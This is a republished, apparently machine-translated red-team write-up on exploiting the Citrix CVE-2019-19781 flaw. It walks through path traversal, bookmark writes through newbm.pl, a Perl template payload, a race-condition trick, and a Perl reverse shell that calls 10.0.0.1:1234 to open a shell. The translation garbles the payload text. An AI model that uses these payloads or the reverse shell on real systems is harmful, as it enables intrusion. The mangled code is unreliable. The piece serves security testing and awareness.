In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-01-19 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
How to hack a Citrix device with CVE-2019-19781 loophole, I believe many inexperienced people don't know what to do about it. Therefore, this paper summarizes the causes and solutions of the problem. Through this article, I hope you can solve this problem.
At the end of 2019, the high-risk vulnerability CVE-2019-19781 of Citrix was disclosed, which affected more than 80,000 corporate network systems in more than 158 countries and faced serious security risks, including directory traversal and remote code execution. If successfully exploited, an attacker can access the victim's internal network without authorization and achieve arbitrary code execution. Coincidentally, I encountered this loophole in a security assessment recently.
CVE-2019-19781 is also known as "Shitrix". Generally speaking, its vulnerability exploitation mechanism uses the template processing process of the Citrix gateway application. Because the script service under / vpn/../vpns/portal/scripts/newbm.pl is called in the process of creating the template, we can construct some template commands in Perl language to form Payload and insert it into a XML file to become .xml. Because our Payload is included in this XML, command execution is triggered when a request is made for / vpn/../vpns/portal/.xml.
Now there are many public vulnerabilities on the network to exploit exploit, as simple as a given target IP can click the enter key to get a rebound shell to achieve the attack. However, these public versions of exploit don't seem to work well in the actual test environments I've encountered, so let's talk about it next.
Vulnerability testing
First, I made a GET request to the target device for directory / vpn/../vpns/cfg/smb.conf, which successfully responded, indicating that the target device has a directory traversal vulnerability.
All right, let's test RCE next, so I directly took advantage of the public version of the bash command line exploit for this vulnerability, but it turned out to be unsuccessful:
After that, I decided to use Burp to look at specific network requests. First, we initiate a POST request for / vpn/../vpns/portal/scripts/newbm.pl to generate a XML file containing the bookmark content. Because directory traversal is used when invoking the newbm.pl service and NSC_USER to save the XML, and then, because the server successfully responded to "Bookmark Added" successfully, this step of directory traversal plus Bookmark writing to the test2.xml is successful.
Here, I think of two analysis methods: one is to test the write permissions of the / vpn/ directory, and the other is to test whether the target device has a blacklist and whitelist. For the first test, my colleague @ edhx0 suggests that you can make a request to rmbm.pl, which removes the Bookmark content from the XML file, not the XML file itself, as a request for rmbm.pl. After initiating the request for rmbm.pl, let's take a look at the Bookmark content in test2.xml:
As you can see, the Bookmark content has been deleted by rmbm.pl. In this way, under the role of newbm.pl, we have write access. In addition, when I write the attack Payload in the Bookmark parameter title, the XML cannot be generated, but when the title parameter is left blank, the XML file can be generated, so it seems that there may be a blacklist in the target device.
Now, we can call the newbm.pl service and leave the title parameter empty, so we can successfully write and generate the XML file, and the vulnerability exploitation of RCE accesses the XML file in it and realizes the code execution.
The bash version of exploit uses the following Payload commands:
[% 25+template.new ({'BLOCK'%3d'exec (\' $2 | tee / netscaler/portal/templates/$filenameid.xml\')% 3b'}) +% 25]
Using the construction of the above Payload at the parameter title, there will be an error response of "The requested page was not found on this server" at first, but after repeated special character deletion tests, a valid XML file will be returned. In the end, I found that the character "BLOCK" was the only reason why Payload could not execute successfully, so I tried to encode the character in a variety of ways and tried to execute it with Perl Template Toolkit, but when I requested the resulting XML file, I always got an error message that the Perl code was running, as follows: the decoded message is: perl error-EVAL_PERL not set ".
It's a little strange that XML is writable and has a Perl runtime environment, so has the XML file or some of its characters been deleted again? But if so, can I use conditional contention (Race Condition) to access XML before it is filtered? For example, I can make 50 concurrent requests to the XML file at the same time, and I can also initiate a Bookmark creation request in it. I hope that one of these 50 requests will successfully hit the XML file and eventually trigger the Payload execution in it. For example, in the Payload of the following figure, I write the configuration file read of ns.conf in the title parameter, and output the final read to the test2.xml file to facilitate the final run and display.
Next, I used Burp Intruder to achieve the concurrency of 50 requests, and it turned out that some requests were able to respond successfully, that is, our conditional contention (Race Condition) was feasible!
Now, the last thing to think about is a rebound in shell. Since the target Citrix device application tested does not have python or netcat installed and needs to involve special characters such as >, &, or double quotes, it is impossible to talk about some typical bounce shell style Payload. Referring to the Perl bounce shell construction method here, I have adopted the following construction method:
Perl-e'tcp "10.0.0.1"; $perl-e'socket "; $if 1234tsocket (" tcp "); if (" open "," > & S "); open (STDOUT," > & S "); open (STDERR," > & S "); exec (" / bin/sh-I ");};';
After that, I converted the above Payload to eval encoding containing the chr () method, and made some coding substitutions, as follows:
In the end, the encoded Payload can be successfully inserted into the Perl Template, which looks a bit lengthy:
Fortunately, after using the previous conditional competition method (Race Condition), I finally got an effective bounce shell, as follows:
Follow up
Two days later, my colleague 0xedh told me that FireEye FireEye had published an article revealing that malware NOTROBIN, after intrusive infection using the CVE-2019-19781 vulnerability, would delete XML files uploaded by other attackers containing the character "BLOCK", forming unique backdoor control over the target Citrix device. Wow, that's it! No wonder I encountered this kind of situation before, it turns out that the Citrix test device has been controlled by the attacker with malicious software NOTROBIN. The following is the backdoor process of NOTROBIN in the Citrix test device:
Vulnerability repair
For Citrix users, you can refer to the mitigation measures officially released by Citrix to fix it. For red team testers, if you encounter "The requested page was not found on this server" when requesting to construct a XML file when using this vulnerability to test the authorization of a target Citrix application, you can consider the "directory traversal + conditional competition + file writing + command execution" mode (Path Traversal + Race Condition + File Write + Command Execution ") to test to get a rebound shell, of course. You also need to consider whether the target Citrix application has been controlled by other attackers with NOTROBIN malware infection.
After reading the above, do you know how to hack a Citrix device with the CVE-2019-19781 vulnerability? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.